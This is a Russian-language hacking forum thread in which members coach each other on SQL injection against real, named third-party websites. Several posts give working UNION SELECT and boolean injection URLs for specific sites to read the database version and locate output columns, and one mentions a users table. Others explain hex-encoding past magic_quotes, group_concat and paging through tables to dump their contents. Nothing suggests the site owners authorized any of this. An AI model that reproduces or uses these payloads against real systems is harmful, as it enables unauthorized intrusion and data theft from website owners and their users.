Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. Nek1t

    Nek1t Elder - Старейшина

    Joined:
    7 Mar 2008
    Messages:
    181
    Likes Received:
    16
    Reputations:
    1
    Посмотрел, но не совсем уловил принцип. А если id_user вообще нет?
    У меня вывод поля идет в заголовки, так что вывести всю таблицу скорее всего не удасться просто в принципе.

    Вот тут заминка: username>'последнего полученного_значения'
    Это ничего не дало - записи выводятся так же с первой и до 1024 символа.
    И то, что username - строковый параметр, не влияет на операцию сравнения?
     
  2. Seravin

    Seravin Active Member

    Joined:
    25 Nov 2009
    Messages:
    475
    Likes Received:
    190
    Reputations:
    221
    Если у тя magic_quotes_gps on то надо привести к hex строку.
    можно посмотреть на поле id и использовать его(оно зачастую auto_increment)
     
  3. Nek1t

    Nek1t Elder - Старейшина

    Joined:
    7 Mar 2008
    Messages:
    181
    Likes Received:
    16
    Reputations:
    1
    Все, разобрался, просто опечатался в запросе, а в hex знаю, что переводить надо.
    Единственный вопрос, как быть с теми случаями, когда нет столбца с id?
     
  4. Seravin

    Seravin Active Member

    Joined:
    25 Nov 2009
    Messages:
    475
    Likes Received:
    190
    Reputations:
    221
    так я ж говорю, просто в твоём случае использовать username
     
  5. CyberHunter

    CyberHunter Active Member

    Joined:
    6 Jan 2010
    Messages:
    601
    Likes Received:
    116
    Reputations:
    37
    Подскажите вот сайт:
    Я так понял, что это слепая инъекция. Т.е. количество полей возможно подобрать, так чтобы отобразилась страница 1163, но что делать дальше если нет принтабельных полей? Брутить? Если да то как это сделать?
    З.Ы. Слепые инъекции - это типа blind?
     
  6. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    Code:
    http://www.garmin.ua/catalog/maps/?id=1163+and+substring(version(),1,1)=4
    
    4-ая ветка, есть табла users
     
  7. Seravin

    Seravin Active Member

    Joined:
    25 Nov 2009
    Messages:
    475
    Likes Received:
    190
    Reputations:
    221
    Почему же она слепая????
    Code:
    http://www.garmin.ua/catalog/maps/?id=1163+and+1=2+union+select+null,version(),null,null,null,null,null,null,null+--+
    
    Но версия всё равно 4ка
     
    3 people like this.
  8. CyberHunter

    CyberHunter Active Member

    Joined:
    6 Jan 2010
    Messages:
    601
    Likes Received:
    116
    Reputations:
    37
    Я так подумал, потому что не было ошибок :)
    Хотел спросить что делает вот это: "+and+1=2" ?
    И почему вместо 1,2,3,... пишется нулл,нулл,... ?
     
  9. Seravin

    Seravin Active Member

    Joined:
    25 Nov 2009
    Messages:
    475
    Likes Received:
    190
    Reputations:
    221
    1111+and+1=2 (false) даёт в резальтате false(типа как -1).

    а null это типо отсутствие значения
     
  10. Ctacok

    Ctacok Banned

    Joined:
    19 Dec 2008
    Messages:
    732
    Likes Received:
    646
    Reputations:
    251
    Зачем его использовать непойму :)
    -1 union select a,b --
    Проще помоему =\
     
    1 person likes this.
  11. Seravin

    Seravin Active Member

    Joined:
    25 Nov 2009
    Messages:
    475
    Likes Received:
    190
    Reputations:
    221
    1) это дело привычки
    2)
    Code:
    http://kip.medaar.ru/prod.php?idsub=-1+union+select+1,2,3,4,5,6+--+&idkat=20&idsup=1
    
    Code:
    http://kip.medaar.ru/prod.php?idsub=105+and+1=2+union+select+1,2,3,4,5,6+--+&idkat=20&idsup=1
    
    (долго это искал чтоб показать)
     
    1 person likes this.
  12. Ctacok

    Ctacok Banned

    Joined:
    19 Dec 2008
    Messages:
    732
    Likes Received:
    646
    Reputations:
    251
    На - реагирует :)
     
  13. Seravin

    Seravin Active Member

    Joined:
    25 Nov 2009
    Messages:
    475
    Likes Received:
    190
    Reputations:
    221
    не очень удобно это как??
     
  14. Seravin

    Seravin Active Member

    Joined:
    25 Nov 2009
    Messages:
    475
    Likes Received:
    190
    Reputations:
    221
    А group_concat использовать пробовал?
     
    1 person likes this.
  15. CyberHunter

    CyberHunter Active Member

    Joined:
    6 Jan 2010
    Messages:
    601
    Likes Received:
    116
    Reputations:
    37
    Скажите, а это уже слепая?
     
  16. Ctacok

    Ctacok Banned

    Joined:
    19 Dec 2008
    Messages:
    732
    Likes Received:
    646
    Reputations:
    251
    :'(
     
  17. Rubaka

    Rubaka Elder - Старейшина

    Joined:
    2 Sep 2007
    Messages:
    263
    Likes Received:
    150
    Reputations:
    28
    Code:
    http://www.ecominfo.spb.ru/about/print.php?id=-1211+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26+%20--+
    а чо бы ей быть слепой?вывод есть!
     
  18. Seravin

    Seravin Active Member

    Joined:
    25 Nov 2009
    Messages:
    475
    Likes Received:
    190
    Reputations:
    221
    Слепота в каком месте???
    Code:
    http://www.ecominfo.spb.ru/about/print.php?id=1211+and+1=2+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,version(),15,16,17,18,19,20,21,22,23,24,25,26+--+
    
     
  19. CyberHunter

    CyberHunter Active Member

    Joined:
    6 Jan 2010
    Messages:
    601
    Likes Received:
    116
    Reputations:
    37
    Бля ошибок - нет(не было). Или я туплю :(
     
  20. Rubaka

    Rubaka Elder - Старейшина

    Joined:
    2 Sep 2007
    Messages:
    263
    Likes Received:
    150
    Reputations:
    28
    неа! если error_reporting(0) то токо ошибки отключаются, а не выводимые поля
     
    1 person likes this.
Thread Status:
Not open for further replies.